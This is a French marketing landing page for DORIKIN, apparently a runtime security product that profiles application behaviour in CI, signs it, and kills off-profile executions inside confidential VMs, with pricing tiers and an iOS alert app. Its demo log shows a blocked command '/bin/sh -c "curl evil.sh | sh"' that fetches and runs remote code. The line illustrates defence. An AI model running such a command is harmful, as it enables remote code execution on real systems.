Souveraineté mathématique · Résistant aux zero-day

Votre application génère son propre bouclier.

Immutable Runtime Enforcer : la sécurité runtime figée à la compilation. Zéro règle à maintenir, zéro éditeur à croire sur parole, zéro dérive tolérée.

cvm-04 · watchdog scellé

$ dorikin profil — CI run #214

signature SHA256 = 8f1c…42a9 · verrouillée · signée Ed25519

attestation matérielle AMD SEV-SNP ✓ — aucun secret embarqué

— production —

84 312 événements conformes au graphe

✗ exec hors graphe : /bin/sh -c "curl evil.sh | sh" → SIGKILL (pré-exécution)

alerte RSSI notifiée · instance saine

La sécurité runtime a un problème de confiance

⏱️

Les EDR détectent après coup

Détection probabiliste une fois l'attaquant déjà à l'intérieur. Rater une signature, c'est rater l'attaque.

🔄

Vous dépendez des mises à jour de l'éditeur

Base de signatures, agent connecté, télémétrie permanente : votre défense appartient à quelqu'un d'autre.

🌍

Une panne éditeur = votre infra exposée

Un point de défaillance unique mondial. L'incident CrowdStrike de 2024 l'a démontré à l'échelle planétaire.

Comment ça marche

De votre CI à la Confidential VM : quatre étapes, aucune règle à écrire.

  1. 1

    🧬

    Profilage en CI/CD

    Pendant vos tests, Tetragon (eBPF) capture le comportement légitime de l'application : exécutions, fichiers, réseau.

  2. 2

    🔏

    Signature déterministe compilée

    Le graphe est normalisé et réduit à une empreinte SHA256 unique, que vous validez puis verrouillez — signée Ed25519.

  3. 3

    🔒

    Watchdog scellé dans la CVM

    Un gardien Go embarque la signature figée à la compilation. Aucun canal entrant, aucun secret, attestation matérielle SEV-SNP.

  4. 4

    Riposte immédiate

    Toute dérive est tuée — au niveau du noyau, avant exécution — et signalée en temps réel. L'instance peut être réinitialisée.

Ce que les EDR ne peuvent pas promettre

Zéro confiance envers l'éditeur

Le gardien n'a besoin ni de nos serveurs, ni de mises à jour, ni d'Internet pour protéger. Même notre propre panne ne vous désarme pas.

Résistance zero-day par conception

Nous ne reconnaissons pas les attaques : nous interdisons tout ce qui n'a pas été prouvé légitime. Une faille inconnue produit un comportement hors graphe — donc mort.

Aucune dépendance Internet du gardien

Scellé à la compilation, sans canal entrant. Rien — pas même nous — ne peut modifier son comportement en marche.

Certitude cryptographique locale

Signature SHA256 vérifiée au boot, profil signé Ed25519, machine prouvée par attestation matérielle AMD SEV-SNP. La confiance se démontre, elle ne se déclare pas.

Votre SOC dans la poche.

Le RSSI suit sa flotte depuis une app iOS native : alertes en streaming temps réel, détail de la dérive (binaire et arguments hors graphe), acquittement en un geste. En temps normal, un seul chiffre à regarder : zéro.

🛡️

24

instances protégées

zéro dérive

🚨

Dérive sur CVM-04

/bin/sh -c "curl …" → tué

instance réinitialisée ✓

DORIKIN Pocket SOC

Confidential VMs · AMD SEV-SNP eBPF / Tetragon Signatures SHA256 + Ed25519 Multi-tenant Souveraineté des données

Tarifs

Starter

Pilote

  • 1 projet
  • Profilage CI illimité
  • Mode shadow + dashboard
  • Support communauté
Commencer

Team

Bientôt

  • Projets illimités
  • Enforcement noyau
  • Pocket SOC iOS
  • Rotation des tokens
Commencer

Enterprise

Sur devis

  • Flotte souveraine
  • Attestation SEV-SNP
  • VOC managé
  • Accompagnement dédié
Nous contacter

Compilez votre bouclier dès le prochain commit.

Connexion GitHub, un workflow copié dans votre CI — votre premier profil comportemental arrive au commit suivant.

Connect with GitHub